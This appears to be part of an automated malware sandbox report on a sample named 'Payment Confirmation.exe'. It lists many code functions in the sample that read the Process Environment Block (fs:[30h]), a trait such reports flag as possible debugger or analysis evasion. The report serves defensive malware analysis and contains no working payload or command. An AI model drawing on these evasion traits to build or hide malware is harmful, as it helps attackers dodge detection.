                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A960B8 mov eax, dword ptr fs:[00000030h]7_2_01A960B8
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A960B8 mov ecx, dword ptr fs:[00000030h]7_2_01A960B8
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D208A mov eax, dword ptr fs:[00000030h]7_2_019D208A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C80A0 mov eax, dword ptr fs:[00000030h]7_2_019C80A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A560E0 mov eax, dword ptr fs:[00000030h]7_2_01A560E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A120F0 mov ecx, dword ptr fs:[00000030h]7_2_01A120F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CC0F0 mov eax, dword ptr fs:[00000030h]7_2_019CC0F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D80E9 mov eax, dword ptr fs:[00000030h]7_2_019D80E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A520DE mov eax, dword ptr fs:[00000030h]7_2_01A520DE
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CA0E3 mov ecx, dword ptr fs:[00000030h]7_2_019CA0E3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE016 mov eax, dword ptr fs:[00000030h]7_2_019EE016
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE016 mov eax, dword ptr fs:[00000030h]7_2_019EE016
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE016 mov eax, dword ptr fs:[00000030h]7_2_019EE016
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE016 mov eax, dword ptr fs:[00000030h]7_2_019EE016
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A66030 mov eax, dword ptr fs:[00000030h]7_2_01A66030
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A54000 mov ecx, dword ptr fs:[00000030h]7_2_01A54000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CA020 mov eax, dword ptr fs:[00000030h]7_2_019CA020
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CC020 mov eax, dword ptr fs:[00000030h]7_2_019CC020
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D2050 mov eax, dword ptr fs:[00000030h]7_2_019D2050
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FC073 mov eax, dword ptr fs:[00000030h]7_2_019FC073
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A56050 mov eax, dword ptr fs:[00000030h]7_2_01A56050
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C8397 mov eax, dword ptr fs:[00000030h]7_2_019C8397
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C8397 mov eax, dword ptr fs:[00000030h]7_2_019C8397
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C8397 mov eax, dword ptr fs:[00000030h]7_2_019C8397
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F438F mov eax, dword ptr fs:[00000030h]7_2_019F438F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F438F mov eax, dword ptr fs:[00000030h]7_2_019F438F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CE388 mov eax, dword ptr fs:[00000030h]7_2_019CE388
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CE388 mov eax, dword ptr fs:[00000030h]7_2_019CE388
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CE388 mov eax, dword ptr fs:[00000030h]7_2_019CE388
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D83C0 mov eax, dword ptr fs:[00000030h]7_2_019D83C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D83C0 mov eax, dword ptr fs:[00000030h]7_2_019D83C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D83C0 mov eax, dword ptr fs:[00000030h]7_2_019D83C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D83C0 mov eax, dword ptr fs:[00000030h]7_2_019D83C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A063FF mov eax, dword ptr fs:[00000030h]7_2_01A063FF
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8C3CD mov eax, dword ptr fs:[00000030h]7_2_01A8C3CD
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A563C0 mov eax, dword ptr fs:[00000030h]7_2_01A563C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE3F0 mov eax, dword ptr fs:[00000030h]7_2_019EE3F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE3F0 mov eax, dword ptr fs:[00000030h]7_2_019EE3F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE3F0 mov eax, dword ptr fs:[00000030h]7_2_019EE3F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A743D4 mov eax, dword ptr fs:[00000030h]7_2_01A743D4
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A743D4 mov eax, dword ptr fs:[00000030h]7_2_01A743D4
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E03E9 mov eax, dword ptr fs:[00000030h]7_2_019E03E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E3DB mov eax, dword ptr fs:[00000030h]7_2_01A7E3DB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E3DB mov eax, dword ptr fs:[00000030h]7_2_01A7E3DB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E3DB mov ecx, dword ptr fs:[00000030h]7_2_01A7E3DB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7E3DB mov eax, dword ptr fs:[00000030h]7_2_01A7E3DB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CC310 mov ecx, dword ptr fs:[00000030h]7_2_019CC310
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA8324 mov eax, dword ptr fs:[00000030h]7_2_01AA8324
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA8324 mov ecx, dword ptr fs:[00000030h]7_2_01AA8324
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA8324 mov eax, dword ptr fs:[00000030h]7_2_01AA8324
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA8324 mov eax, dword ptr fs:[00000030h]7_2_01AA8324
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F0310 mov ecx, dword ptr fs:[00000030h]7_2_019F0310
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A30B mov eax, dword ptr fs:[00000030h]7_2_01A0A30B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A30B mov eax, dword ptr fs:[00000030h]7_2_01A0A30B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A30B mov eax, dword ptr fs:[00000030h]7_2_01A0A30B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7437C mov eax, dword ptr fs:[00000030h]7_2_01A7437C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA634F mov eax, dword ptr fs:[00000030h]7_2_01AA634F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A52349 mov eax, dword ptr fs:[00000030h]7_2_01A52349
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A78350 mov ecx, dword ptr fs:[00000030h]7_2_01A78350
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov eax, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov eax, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov eax, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov ecx, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov eax, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5035C mov eax, dword ptr fs:[00000030h]7_2_01A5035C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9A352 mov eax, dword ptr fs:[00000030h]7_2_01A9A352
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov eax, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov ecx, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov eax, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov eax, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov eax, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A662A0 mov eax, dword ptr fs:[00000030h]7_2_01A662A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E284 mov eax, dword ptr fs:[00000030h]7_2_01A0E284
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E284 mov eax, dword ptr fs:[00000030h]7_2_01A0E284
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A50283 mov eax, dword ptr fs:[00000030h]7_2_01A50283
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A50283 mov eax, dword ptr fs:[00000030h]7_2_01A50283
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A50283 mov eax, dword ptr fs:[00000030h]7_2_01A50283
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E02A0 mov eax, dword ptr fs:[00000030h]7_2_019E02A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E02A0 mov eax, dword ptr fs:[00000030h]7_2_019E02A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA2C3 mov eax, dword ptr fs:[00000030h]7_2_019DA2C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA2C3 mov eax, dword ptr fs:[00000030h]7_2_019DA2C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA2C3 mov eax, dword ptr fs:[00000030h]7_2_019DA2C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA2C3 mov eax, dword ptr fs:[00000030h]7_2_019DA2C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA2C3 mov eax, dword ptr fs:[00000030h]7_2_019DA2C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA62D6 mov eax, dword ptr fs:[00000030h]7_2_01AA62D6
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E02E1 mov eax, dword ptr fs:[00000030h]7_2_019E02E1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E02E1 mov eax, dword ptr fs:[00000030h]7_2_019E02E1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E02E1 mov eax, dword ptr fs:[00000030h]7_2_019E02E1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C823B mov eax, dword ptr fs:[00000030h]7_2_019C823B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D6259 mov eax, dword ptr fs:[00000030h]7_2_019D6259
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CA250 mov eax, dword ptr fs:[00000030h]7_2_019CA250
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80274 mov eax, dword ptr fs:[00000030h]7_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A58243 mov eax, dword ptr fs:[00000030h]7_2_01A58243
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A58243 mov ecx, dword ptr fs:[00000030h]7_2_01A58243
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C826B mov eax, dword ptr fs:[00000030h]7_2_019C826B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA625D mov eax, dword ptr fs:[00000030h]7_2_01AA625D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8A250 mov eax, dword ptr fs:[00000030h]7_2_01A8A250
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8A250 mov eax, dword ptr fs:[00000030h]7_2_01A8A250
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D4260 mov eax, dword ptr fs:[00000030h]7_2_019D4260
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D4260 mov eax, dword ptr fs:[00000030h]7_2_019D4260
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D4260 mov eax, dword ptr fs:[00000030h]7_2_019D4260
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A505A7 mov eax, dword ptr fs:[00000030h]7_2_01A505A7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A505A7 mov eax, dword ptr fs:[00000030h]7_2_01A505A7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A505A7 mov eax, dword ptr fs:[00000030h]7_2_01A505A7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D2582 mov eax, dword ptr fs:[00000030h]7_2_019D2582
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D2582 mov ecx, dword ptr fs:[00000030h]7_2_019D2582
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A04588 mov eax, dword ptr fs:[00000030h]7_2_01A04588
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F45B1 mov eax, dword ptr fs:[00000030h]7_2_019F45B1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F45B1 mov eax, dword ptr fs:[00000030h]7_2_019F45B1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E59C mov eax, dword ptr fs:[00000030h]7_2_01A0E59C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D65D0 mov eax, dword ptr fs:[00000030h]7_2_019D65D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0C5ED mov eax, dword ptr fs:[00000030h]7_2_01A0C5ED
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0C5ED mov eax, dword ptr fs:[00000030h]7_2_01A0C5ED
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E5CF mov eax, dword ptr fs:[00000030h]7_2_01A0E5CF
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E5CF mov eax, dword ptr fs:[00000030h]7_2_01A0E5CF
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A5D0 mov eax, dword ptr fs:[00000030h]7_2_01A0A5D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A5D0 mov eax, dword ptr fs:[00000030h]7_2_01A0A5D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE5E7 mov eax, dword ptr fs:[00000030h]7_2_019FE5E7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D25E0 mov eax, dword ptr fs:[00000030h]7_2_019D25E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE53E mov eax, dword ptr fs:[00000030h]7_2_019FE53E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE53E mov eax, dword ptr fs:[00000030h]7_2_019FE53E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE53E mov eax, dword ptr fs:[00000030h]7_2_019FE53E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE53E mov eax, dword ptr fs:[00000030h]7_2_019FE53E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE53E mov eax, dword ptr fs:[00000030h]7_2_019FE53E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A66500 mov eax, dword ptr fs:[00000030h]7_2_01A66500
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4500 mov eax, dword ptr fs:[00000030h]7_2_01AA4500
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4500 mov eax, dword ptr fs:[00000030h]7_2_01AA4500
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4500 mov eax, dword ptr fs:[00000030h]7_2_01AA4500
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4500 mov eax, dword ptr fs:[00000030h]7_2_01AA4500
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4500 mov eax, dword ptr fs:[00000030h]7_2_01AA4500
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4500 mov eax, dword ptr fs:[00000030h]7_2_01AA4500
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4500 mov eax, dword ptr fs:[00000030h]7_2_01AA4500
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0535 mov eax, dword ptr fs:[00000030h]7_2_019E0535
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0535 mov eax, dword ptr fs:[00000030h]7_2_019E0535
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0535 mov eax, dword ptr fs:[00000030h]7_2_019E0535
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0535 mov eax, dword ptr fs:[00000030h]7_2_019E0535
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0535 mov eax, dword ptr fs:[00000030h]7_2_019E0535
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0535 mov eax, dword ptr fs:[00000030h]7_2_019E0535
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0656A mov eax, dword ptr fs:[00000030h]7_2_01A0656A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0656A mov eax, dword ptr fs:[00000030h]7_2_01A0656A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0656A mov eax, dword ptr fs:[00000030h]7_2_01A0656A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D8550 mov eax, dword ptr fs:[00000030h]7_2_019D8550
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D8550 mov eax, dword ptr fs:[00000030h]7_2_019D8550
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A044B0 mov ecx, dword ptr fs:[00000030h]7_2_01A044B0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5A4B0 mov eax, dword ptr fs:[00000030h]7_2_01A5A4B0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8A49A mov eax, dword ptr fs:[00000030h]7_2_01A8A49A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D64AB mov eax, dword ptr fs:[00000030h]7_2_019D64AB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D04E5 mov ecx, dword ptr fs:[00000030h]7_2_019D04E5
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A56420 mov eax, dword ptr fs:[00000030h]7_2_01A56420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A56420 mov eax, dword ptr fs:[00000030h]7_2_01A56420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A56420 mov eax, dword ptr fs:[00000030h]7_2_01A56420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A56420 mov eax, dword ptr fs:[00000030h]7_2_01A56420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A56420 mov eax, dword ptr fs:[00000030h]7_2_01A56420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A56420 mov eax, dword ptr fs:[00000030h]7_2_01A56420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A56420 mov eax, dword ptr fs:[00000030h]7_2_01A56420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A430 mov eax, dword ptr fs:[00000030h]7_2_01A0A430
